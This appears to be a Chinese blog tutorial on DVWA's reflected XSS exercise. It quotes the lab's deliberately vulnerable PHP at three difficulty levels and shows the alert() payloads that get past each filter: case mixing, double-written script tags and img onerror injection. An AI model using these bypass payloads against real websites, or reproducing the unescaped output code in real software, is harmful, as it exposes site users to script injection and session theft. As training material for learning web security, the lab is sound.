PHP代码审计DVWA[XSS (Reflected)]

XSS (Reflected)反射型XSS

靶场搭建可用蓝易云服务器

😘😘😘点击查看详细

又称为非持久性跨站点脚本攻击,它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击) 恶意代码并没有保存在目标网站,由浏览器解析脚本。

反射型xss,其实练习完就能感受到比起存储型xss,利用起来要困难很多

反射型不像存储型会存储在网站上,当别人来访问时就会执行,这里需要我们自己来构造链接诱使用户点击,这比起存储型xss就明显复杂很多,存储xss,类似留言板我们把xss payload仍上去后不用管,只要不被删,用户的信息就会往我们的xss平台上发了

所以说反射型和存储型在找漏洞的时候就是不一样的,反射型就需要见框就插。

Low

代码分析

<?php
//X-XSS-Protection: 1 :强制XSS保护(用户禁用XSS保护时有用)

//X-XSS-Protection: 0 :禁用XSS保护
header ("X-XSS-Protection: 0");

// Is there any input?
//判断值非空
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    //输入用户输出的值
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?> 

在这里插入图片描述

代码中可以看到,在low级别中没用进行任何的对XSS攻击的防御措施,用户输入什么都会被执行。

那么我们直接

<script>alert(/xss/)</script>

在这里插入图片描述

Medium

代码分析

 <?php
//X-XSS-Protection: 1 :强制XSS保护(用户禁用XSS保护时有用)

//X-XSS-Protection: 0 :禁用XSS保护
header ("X-XSS-Protection: 0");

// Is there any input?
//获取用户输入的值
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    //过滤掉了<script>
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    //输出用户的数据
    echo "<pre>Hello ${name}</pre>";
}

?>



<script>标签被过滤了,尝试使用大小写混淆或者双写绕过

<ScRipt>alert(/xss/)</script>

在这里插入图片描述

成功弹窗!!!

我们试试双写的

<sc<script>ript>alert(/xss/)</script>

在这里插入图片描述

成功弹窗!!!

那么用img图片的呢

<img src=x οnerrοr=alert(/xss/)>

在这里插入图片描述

写进去了

High

代码分析

 <?php
//X-XSS-Protection: 1 :强制XSS保护(用户禁用XSS保护时有用)

//X-XSS-Protection: 0 :禁用XSS保护
header ("X-XSS-Protection: 0");

// Is there any input?
//非空判断
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    //过滤掉了/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i',这些字符
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    //输出用户输入的信息
    echo "<pre>Hello ${name}</pre>";
}

?>



我们通过代码发现基本我们XSS的语句店铺被过滤掉了

script标签代码被过滤

那么就尝试使用img、body等标签的事件或者iframe等标签的src注入恶意js代码

<img src=1 οnerrοr=alert(1)>

在这里插入图片描述

能写进去

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无聊的知识

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值